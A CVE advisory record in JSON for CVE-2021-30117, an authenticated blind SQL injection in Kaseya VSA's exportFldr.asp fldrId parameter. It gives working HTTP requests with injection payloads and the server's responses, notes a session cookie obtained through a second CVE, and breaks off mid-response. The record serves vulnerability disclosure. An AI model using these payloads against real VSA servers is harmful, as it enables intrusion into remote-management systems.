{"CVE_data_meta":{"ASSIGNER":"cve@mitre.org","ID":"CVE-2021-30117","STATE":"PUBLIC","TITLE":"Authenticated SQL injection in Kaseya VSA < v9.5.6"},"affects":{"vendor":{"vendor_data":[{"product":{"product_data":[{"product_name":"Kaseya VSA (on premise and SaaS)","version":{"version_data":[{"version_affected":"<","version_name":"9.x","version_value":"9.5.6"}]}},{"product_name":"Kaseya VSA Agent","version":{"version_data":[{"version_affected":"<","version_name":"9.x","version_value":"9.5.0.23"}]}}]},"vendor_name":"Kaseya"}]}},"credit":[{"lang":"eng","value":"Discovered by Wietse Boonstra of DIVD"},{"lang":"eng","value":"Additional research by Frank Breedijk of DIVD"}],"data_format":"MITRE","data_type":"CVE","data_version":"4.0","description":{"description_data":[{"lang":"eng","value":"The API call /InstallTab/exportFldr.asp is vulnerable to a semi-authenticated boolean-based blind SQL injection in the parameter fldrId.\n\nDetailed description\n---\n\nGiven the following request:\n```\nGET /InstallTab/exportFldr.asp?fldrId=1’ HTTP/1.1\nHost: 192.168.1.194\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nDNT: 1\nConnection: close\nUpgrade-Insecure-Requests: 1\nCookie: ASPSESSIONIDCQACCQCA=MHBOFJHBCIPCJBFKEPEHEDMA; sessionId=30548861; agentguid=840997037507813; vsaUser=scopeId=3&roleId=2; webWindowId=59091519;\n```\n\nWhere the sessionId cookie value has been obtained via CVE-2021-30116. The result should be a failure.\n\nResponse:\n```\nHTTP/1.1 500 Internal Server Error\nCache-Control: private\nContent-Type: text/html; Charset=Utf-8\nDate: Thu, 01 Apr 2021 19:12:11 GMT\nStrict-Transport-Security: max-age=63072000; includeSubDomains\nConnection: close\nContent-Length: 881\n \n\n\n \n\n \tWhoops.\n \n \n \n\t\n \n----SNIP----\n```\n\nHowever when fldrId is set to ‘(SELECT (CASE WHEN (1=1) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END))’ the request is allowed.\n\nRequest:\n```\nGET /InstallTab/exportFldr.asp?fldrId=%28SELECT%20%28CASE%20WHEN%20%281%3D1%29%20THEN%201%20ELSE%20%28SELECT%201%20UNION%20SELECT%202%29%20END%29%29 HTTP/1.1\nHost: 192.168.1.194\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nDNT: 1\nConnection: close\nUpgrade-Insecure-Requests: 1\nCookie: ASPSESSIONIDCQACCQCA=MHBOFJHBCIPCJBFKEPEHEDMA; sessionId=30548861; agentguid=840997037507813; vsaUser=scopeId=3&roleId=2; webWindowId=59091519;\n```\n\nResponse:\n```\nHTTP/1.1 200 OK\nCache-Control: private\nContent-Type: text/html; Charset=Utf-8\nDate: Thu, 01 Apr 2021 17:33:53 GMT\nStrict-Transport-Security: max-age=63072000; includeSubDomains\nConnection: close\nContent-Length: 7960\n \n \n\n\nExport Folder\n